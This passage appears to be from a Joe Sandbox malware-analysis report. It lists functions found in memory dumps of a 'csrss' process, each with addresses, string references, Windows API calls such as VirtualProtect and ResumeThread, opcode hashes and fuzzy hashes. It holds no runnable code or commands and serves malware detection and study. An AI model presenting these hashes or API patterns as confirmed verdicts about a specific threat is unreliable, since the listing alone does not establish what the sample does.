Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: 123e73edbe8ebf4991183b4aa45e9aab390fdd09fa13e5fb56b79fdabb996fc5
Instruction ID: 3f342e69eb23935638dd3e422c88b14ad376482561e888788c1964e029a82c3f
Opcode Fuzzy Hash: 123e73edbe8ebf4991183b4aa45e9aab390fdd09fa13e5fb56b79fdabb996fc5
Instruction Fuzzy Hash: F9618D70D4964B9FEB19DB98C8556FDBBB5EF45300F10817AE00ED7292DA34A909CB81

Function 00007FFAAC5D4058 Relevance: 2.7, Strings: 2, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D4087
, xrefs: 00007FFAAC5D40D2

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: 44180e679d2ef21be1006c9a994a18488bbeccd6f3939ab8e394de1ed81043a1
Instruction ID: 34ef649f2487f4e70be3fca9d8ec369219fea9044813c64e026e6ca8e9193b4e
Opcode Fuzzy Hash: 44180e679d2ef21be1006c9a994a18488bbeccd6f3939ab8e394de1ed81043a1
Instruction Fuzzy Hash: 64515D71D4964ACFEB49CB98C4556BDBBB1EF55300F10817AD00EE7282CF38A909CB81

Function 00007FFAAC4D0378 Relevance: 2.7, Strings: 2, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC4D03A7
, xrefs: 00007FFAAC4D03F2

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: 564acd089e525b9b5a22eef6f0173c8970a2aad3f493ee2c6a0a5c63445ec360
Instruction ID: ec3152c33679ebdfdd65695326fbfb577641bfdeac58e136420518a2c84c9b54
Opcode Fuzzy Hash: 564acd089e525b9b5a22eef6f0173c8970a2aad3f493ee2c6a0a5c63445ec360
Instruction Fuzzy Hash: C4515171D0964ACFEB4AEBA4C4556FDBBB1FF45304F1080BAD40EE7292CA34A905CB95

Function 00007FFAAC5D79CD Relevance: 2.6, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D7A19
r6, xrefs: 00007FFAAC5D79DB

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: aa2aff8946c9937e434d6629de4b644002f024f0e7404e6cb24dc3eaa2d97146
Instruction ID: b8355dd026890a810c68b3e78e43e81312396c7e66de6bb31a85c4a87f98d75c
Opcode Fuzzy Hash: aa2aff8946c9937e434d6629de4b644002f024f0e7404e6cb24dc3eaa2d97146
Instruction Fuzzy Hash: 1D316371A4DA0A8BE749DB5CD491AB8F7A2FF55310B10827AD00ED3286DE24FC16C7C0

Function 00007FFAAC5D2ABB Relevance: 2.6, Strings: 2, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D2AC9
r6, xrefs: 00007FFAAC5D2B07

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 518d2ac0afaaec7a600c1acd248e83baf21220a8190fd1e12c1b44619f06acbc
Instruction ID: 117676f517764efe69deb1e8efd226c6f3d8486d7ecd83ddf050fbd51f1e27a6
Opcode Fuzzy Hash: 518d2ac0afaaec7a600c1acd248e83baf21220a8190fd1e12c1b44619f06acbc
Instruction Fuzzy Hash: 06314071B59A0ACFEB99DB58D8919ACB7A2FF55310B50827AD00ED3281CE24BC1687C0

Function 00007FFAAC5D2B75 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D2BA0
r6, xrefs: 00007FFAAC5D2B76

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: df20203ec8d89f642658f6475ed312903440f3a0c897794d7884c5b24b60c6de
Instruction ID: 9defd0aca0278a8021acfd890a0ba0f4fa33c646b1b88d22d4838f1322d4c236
Opcode Fuzzy Hash: df20203ec8d89f642658f6475ed312903440f3a0c897794d7884c5b24b60c6de
Instruction Fuzzy Hash: 2531E571D5EB4A8FFB89EB6898127A8B791EF66300F444176E04EC32D2D9189C0A87D1

Function 00007FFAAC5D7A8A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D7A8B
r6, xrefs: 00007FFAAC5D7AB5

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: feca5025d77d06e5b75909b7e1e63a600da2ff08822bd78bd8e9616d0c23c3ef
Instruction ID: b3659959451f1bfb51c0903ea4c440d6a8e78016484223a6ded19d9e1ed769b2
Opcode Fuzzy Hash: feca5025d77d06e5b75909b7e1e63a600da2ff08822bd78bd8e9616d0c23c3ef
Instruction Fuzzy Hash: E5310961A4DB8ACFF749E76888027A8B7D1FF56354F44427AD04EC7286ED18A80987C0

Function 00007FFAAC46C830 Relevance: 2.6, Strings: 2, Instructions: 60COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC46C83A
r6, xrefs: 00007FFAAC46C88C

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID: r6$/
API String ID: 0-322465848
Opcode ID: ee8d6d349b31a9ea1dc9f9870a7df6ecb175087d948efc4289fa1b92e6550a6f
Instruction ID: 77fdede88341d124d8d3037caeac28f42c7bec3191267d77c549220c13f1e566
Opcode Fuzzy Hash: ee8d6d349b31a9ea1dc9f9870a7df6ecb175087d948efc4289fa1b92e6550a6f
Instruction Fuzzy Hash: 76010892E6DA864BE658A378C81DEE5F3C0FF64200F04827AD40FC3586ED1CA84543C1

Function 00007FFAAC46C41D Relevance: 2.1, Strings: 1, Instructions: 885COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4C49A5

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 34ce6b90720acbe4bb536703e458c00583e4e724355bd517a467cf79cab627d1
Instruction ID: 52fce4c0629fafdc13ba4b024771de6e5c64c3d7f5d36599661a2231c299dffa
Opcode Fuzzy Hash: 34ce6b90720acbe4bb536703e458c00583e4e724355bd517a467cf79cab627d1
Instruction Fuzzy Hash: 0252263090E6858FF76AD728C459A747BE0EF16318F1441BEC08EC75A3DE29E84AC784

Function 00007FFAAC468B98 Relevance: 1.9, APIs: 1, Instructions: 406COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFAAC46AF9F

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac460000_csrss.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 81ea9544a2c95bfb912b971500efa8e6b1ec6af0a44ccaa054a37e17a6df0e90
Instruction ID: ca0149544a085dbcb1e29004c338ef2ca0d7f709b793c5769daf17d4f7fe3fa8
Opcode Fuzzy Hash: 81ea9544a2c95bfb912b971500efa8e6b1ec6af0a44ccaa054a37e17a6df0e90
Instruction Fuzzy Hash: D5B1E331A0DF098FF7589718D4496B9B7D2EB96325F04827ED04ED329ADE24E80A87C5

Function 00007FFAAC5D42CF Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

b4, xrefs: 00007FFAAC5D4762

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: b4
API String ID: 0-3371602342
Opcode ID: fed0d380c7f8935064de170c0514c0d60e463cc0c93cdf4877679ed44db78197
Instruction ID: ffa0f1078148ddf523ba05cddcd8264652759d09aa60df1d860aedcee69e01b2
Opcode Fuzzy Hash: fed0d380c7f8935064de170c0514c0d60e463cc0c93cdf4877679ed44db78197
Instruction Fuzzy Hash: BDF1B030559646CFEB49CF18C4D16B537A5FF46310B5086BAE84F8B68ADB38E885CB81

Function 00007FFAAC469D6E Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFAAC469E99

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac460000_csrss.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: da45baaeaa3f486ef52563cbf312db762ad50189aa6c47be47d83a69c5a98d23
Instruction ID: fadd7a59f4080edea7bde3b4bfe0c390128aeaf125fef08adb4f83fc570e8068
Opcode Fuzzy Hash: da45baaeaa3f486ef52563cbf312db762ad50189aa6c47be47d83a69c5a98d23
Instruction Fuzzy Hash: 2E51D53080DB988FDB55DF58D845AA97BE0EF6A320F1442AFE089D3252C775A845CBC2

Function 00007FFAAC4D05EF Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

b4, xrefs: 00007FFAAC4D0A82

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: b4
API String ID: 0-3371602342
Opcode ID: 76f1c2dcc9f42d079ee0da3ec3fa411636ddd67a5a7251f4d3201923b52f795c
Instruction ID: e878f1b45d07db5ee38de65d2cd701be92dd08f532df4c740840db0da28c3dc3
Opcode Fuzzy Hash: 76f1c2dcc9f42d079ee0da3ec3fa411636ddd67a5a7251f4d3201923b52f795c
Instruction Fuzzy Hash: F6E1D130519656CFFB49DF18C4E46B43BA1FF56314B5481FEC84E8B68ACA38E885CB85

Function 00007FFAAC5DAE95 Relevance: 1.6, Strings: 1, Instructions: 394COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC5DAF06

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 4cf5187a2cfc6c110f848b9e23630500207c65889198950814046c79906272ac
Instruction ID: deaf1020ed89b07c924ba9e17ffb3785aa4bfdee611ecae42966886c3b848ec4
Opcode Fuzzy Hash: 4cf5187a2cfc6c110f848b9e23630500207c65889198950814046c79906272ac
Instruction Fuzzy Hash: 24D1C531A59A0A8FFB95EB68C455BB973E6EF45304F5440BAE00EC72D2CE29EC45C781

Function 00007FFAAC469EDD Relevance: 1.6, APIs: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFAAC469FB7

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac460000_csrss.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 56d6b7d7a87b81216df6a3502ab98b234ccf6e5a10fcae14b86bd708403fdbcf
Instruction ID: 719d1f5fa0649a6b4c0afd0f9ec9efe7dbdb12db036a8039ee63af41d763300f
Opcode Fuzzy Hash: 56d6b7d7a87b81216df6a3502ab98b234ccf6e5a10fcae14b86bd708403fdbcf
Instruction Fuzzy Hash: E141B17190CA488FDB58DF58D8497B9BBE1FBA9321F04826FD049D3292CB74A845CB81

Function 00007FFAAC4CD7F3 Relevance: 1.6, Strings: 1, Instructions: 361COMMON

Download Yara Rule

Strings

lH_^, xrefs: 00007FFAAC4CD801

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: lH_^
API String ID: 0-2681042615
Opcode ID: b7cc4613ebd5e30c5e6904b316e6546b0f8683618eb60694fe3afa2f882811c7
Instruction ID: 45e083c3220dc42ff5ade3cfe2a44a3ca715e39bc2f0c6e2b0bf3e264594e946
Opcode Fuzzy Hash: b7cc4613ebd5e30c5e6904b316e6546b0f8683618eb60694fe3afa2f882811c7
Instruction Fuzzy Hash: C9412C5298D957C7F25677A8F8198F82740DF82728F08C177D44E891E3CC0D789947D9

Function 00007FFAAC4C61E5 Relevance: 1.6, APIs: 1, Instructions: 103threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 00007FFAAC4C6275

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: baa7ea5e21ef7f734373ecb98c536edb30ec91f9189071277f2d285ff5a4d646
Instruction ID: 003e458b34027128c1375e542ec2410084f9d67519ff889fbf2540947a1dfe6e
Opcode Fuzzy Hash: baa7ea5e21ef7f734373ecb98c536edb30ec91f9189071277f2d285ff5a4d646
Instruction Fuzzy Hash: 6D31B13190CA4C8FEB49DBA8C849BE9BBF0FB56311F04816ED04DC3662DB65A815CB91

Function 00007FFAAC46AF18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFAAC46AF9F

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac460000_csrss.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 6d4985a6c60c638212f78d9b9938fc891e7d2e0ec28582f9b4a5c4051ee9570c
Instruction ID: 858cbe5c94ab4985c7278570bb9306f69c9685920d00d858867c7a9c93ece8aa
Opcode Fuzzy Hash: 6d4985a6c60c638212f78d9b9938fc891e7d2e0ec28582f9b4a5c4051ee9570c
Instruction Fuzzy Hash: 93218071908A0C9FDB58DBA8D849BE9BBF1FB95311F00822FD00DD3651DB71A8568B91

Function 00007FFAAC4C698F Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFAAC4C6A05

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fc1607e1f34ff0a8db17fbdd314d93244f507edacf3d7d4a9be2d8d387ab010c
Instruction ID: 8848ccce3ab54126796f36677cdc4df35339477d3e9cf7b1b062720d4f86d652
Opcode Fuzzy Hash: fc1607e1f34ff0a8db17fbdd314d93244f507edacf3d7d4a9be2d8d387ab010c
Instruction Fuzzy Hash: E121B33090CA0C8FDB58DF98D449BE9BBE0FB95321F00422ED00DD3651CB71A855CB91

Function 00007FFAAC4C696D Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFAAC4C6A05

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ee6998873f54e453e9f0c602abaa6fca3e725359e6f5cddf9564aeea9f9c4f4f
Instruction ID: d32614fb7b5f3814f4595fc97b6df4c5be46ce73c069c9d8e881d669a473f834
Opcode Fuzzy Hash: ee6998873f54e453e9f0c602abaa6fca3e725359e6f5cddf9564aeea9f9c4f4f
Instruction Fuzzy Hash: A4118C7490CA4CCFEB49DFA8D4447A8BBF0FB95325F00826AC04ED36A1C765A459CB91

Function 00007FFAAC4CC438 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFAAC4CC707

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 21c9c1430177c97a2d8ad5bff9e4dc34f409a153eb3c931cdc21289b3287000b
Instruction ID: fa84ace22f29a857abfe253fde2c2f94a23b2eebbc8a087feb8c0e816237f785
Opcode Fuzzy Hash: 21c9c1430177c97a2d8ad5bff9e4dc34f409a153eb3c931cdc21289b3287000b
Instruction Fuzzy Hash: 8691D270A1DA0A8BEB49DF18D489A3673E1FF99304B10857DD44EC72A6DA35E843CBC5

Function 00007FFAAC4C6000 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00007FFAAC4C6002

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b8095336de7b9babfedd2c30d13547c056f7948a0b2bff3610530b77672734e9
Instruction ID: 3487a3599d5e19304aeaefe815a742b2a278f449ada2adb63f43bac26157998b
Opcode Fuzzy Hash: b8095336de7b9babfedd2c30d13547c056f7948a0b2bff3610530b77672734e9
Instruction Fuzzy Hash: E1E0653250C6058EF7089B5DE4067F4B7E0E751336F00926FE089C2852D769A1AA8BA5

Function 00007FFAAC5D6CEB Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC5D6D06

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: 4ecf671de97bc00171527de4fceb84acb899fdae0513a3835b4aef38b6ae506a
Instruction ID: 4992ecc761613b9ef5bf34cbecd5f8beb15af7daac03f72d8b7aa0cfc64a5f7e
Opcode Fuzzy Hash: 4ecf671de97bc00171527de4fceb84acb899fdae0513a3835b4aef38b6ae506a
Instruction Fuzzy Hash: 0681F43495E64BCFFF56DB68C8517BD7BA4EF56300F10497AE00EC7192DE28A8468781

Function 00007FFAAC5D1DDB Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC5D1DF6

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: a9638046bcb20766b436708988fabc21d8d85cb9699461af45176276ee18d0ec
Instruction ID: c0e0bebd2416cc7cf14a390bcee3505b1cea7b4103a244a9576eeb763e805b3b
Opcode Fuzzy Hash: a9638046bcb20766b436708988fabc21d8d85cb9699461af45176276ee18d0ec
Instruction Fuzzy Hash: 1171D130D5E74BCEFB96DB64C854BBA7BA5EF46310F1045BAE00ED3182DA289845C791

Function 00007FFAAC4CE0FB Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC4CE116

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: 53cb7d62c760b81f092cf40860de6e49fbf7fbd20bb4f3f19350bcac159fb372
Instruction ID: d4471d502b898f6f5e2d2fa745ce38b6ccfb46288dac4b39e2be45737138c3d3
Opcode Fuzzy Hash: 53cb7d62c760b81f092cf40860de6e49fbf7fbd20bb4f3f19350bcac159fb372
Instruction Fuzzy Hash: CE518C7191E54ACFFB96DB64C858ABCBBB1FF0A304F54447AD01ED61A2DF28A805C784

Function 00007FFAAC4CFF0E Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4CFF53

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: a87e1f2b0efee69f1b4be7f232c4fdc9ca3226e99562deb97a0ba8ac15e06fe0
Instruction ID: f44bfe37ac0f414a0384b28797dbb19fb96b15946559826314dd3b1af0a69feb
Opcode Fuzzy Hash: a87e1f2b0efee69f1b4be7f232c4fdc9ca3226e99562deb97a0ba8ac15e06fe0
Instruction Fuzzy Hash: 035193706099079BF74AEB28D0597B4B7A1FF55304F54C13AC40EC7A96DB28F8558BC8

Function 00007FFAAC4C62B4 Relevance: 1.4, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFAAC4C6355

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1042a52ccbeca40200dd01274063a28fde785c796efc12e3b11b4fdec9010c4d
Instruction ID: 589cc05d4ebbac8fbab78fac9b14e103649613dbd22928b43a5b5e63c02c7d06
Opcode Fuzzy Hash: 1042a52ccbeca40200dd01274063a28fde785c796efc12e3b11b4fdec9010c4d
Instruction Fuzzy Hash: F931FB7190CA0C8FEB59DB58C445BF97BE0FF56321F00822ED04DC31A2DA74A855CB91

Function 00007FFAAC4CDD72 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4CDDA3

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 817fbb320b0814778782d0b7f9d0aebf3444664912a9cc3da21849579c9b57c6
Instruction ID: 256dd571af02b1cb2a4284892f26f0769cbae7f42c71d37f8a0297e4b07c67f1
Opcode Fuzzy Hash: 817fbb320b0814778782d0b7f9d0aebf3444664912a9cc3da21849579c9b57c6
Instruction Fuzzy Hash: E1210C71E1891D9FEF99DB58C4A5AEDB7B1FF69304F0041AAD00EE32A1CE34A9518B40

Function 00007FFAAC5D6979 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D6993

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 13305efcca767e261937b86ca5cd30d7361914a5a1e3e4bcc0be3d2c3bbe93e9
Instruction ID: 9292d4e67906f27eb695d57243117ac38d65b34a4bf06bf5be591565d1352dfa
Opcode Fuzzy Hash: 13305efcca767e261937b86ca5cd30d7361914a5a1e3e4bcc0be3d2c3bbe93e9
Instruction Fuzzy Hash: BE216D74E49A0ADFEF99DB58C456AADB7F0EF59310F0045BEE00ED3291CE34A9458B40

Function 00007FFAAC5D1A69 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D1A83

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: f85b298ad0a9853f4fa71171e1f5afc9cd7368ec27c1ee4268f247c4c8812c32
Instruction ID: 9f3158dcf5b879b18f7a295786026c211423058776abb1cc97d2fd4eda659373
Opcode Fuzzy Hash: f85b298ad0a9853f4fa71171e1f5afc9cd7368ec27c1ee4268f247c4c8812c32
Instruction Fuzzy Hash: 22213E71E5960A9FEB9DDB58C456AAEB7B1FF59310F4040BEE00FD3291CE34A9458B80

Function 00007FFAAC5D5311 Relevance: .4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac211bcf08b0f1c84ba6f9f0d78f192d4c0c6ed1ebda193e8bf6101635e25e2a
Instruction ID: 8c6dd25d4aae49b4ada6b4ffc0c9022d186063b39670e8440059b1a78a4a58d7
Opcode Fuzzy Hash: ac211bcf08b0f1c84ba6f9f0d78f192d4c0c6ed1ebda193e8bf6101635e25e2a
Instruction Fuzzy Hash: 4CD1E1B095EB078FF76ACB28D49167577E5FF45300B50857EE08EC3692DA28F84A8781

Function 00007FFAAC5DA241 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bc85b26ae501bb140c755d2f0b3589485e2862ad28eb86b8b312ec8c46ca44
Instruction ID: 2b9bbb1915de76fa4caded9712c3b7278848996733f978d3121dc324221d9f59
Opcode Fuzzy Hash: 87bc85b26ae501bb140c755d2f0b3589485e2862ad28eb86b8b312ec8c46ca44
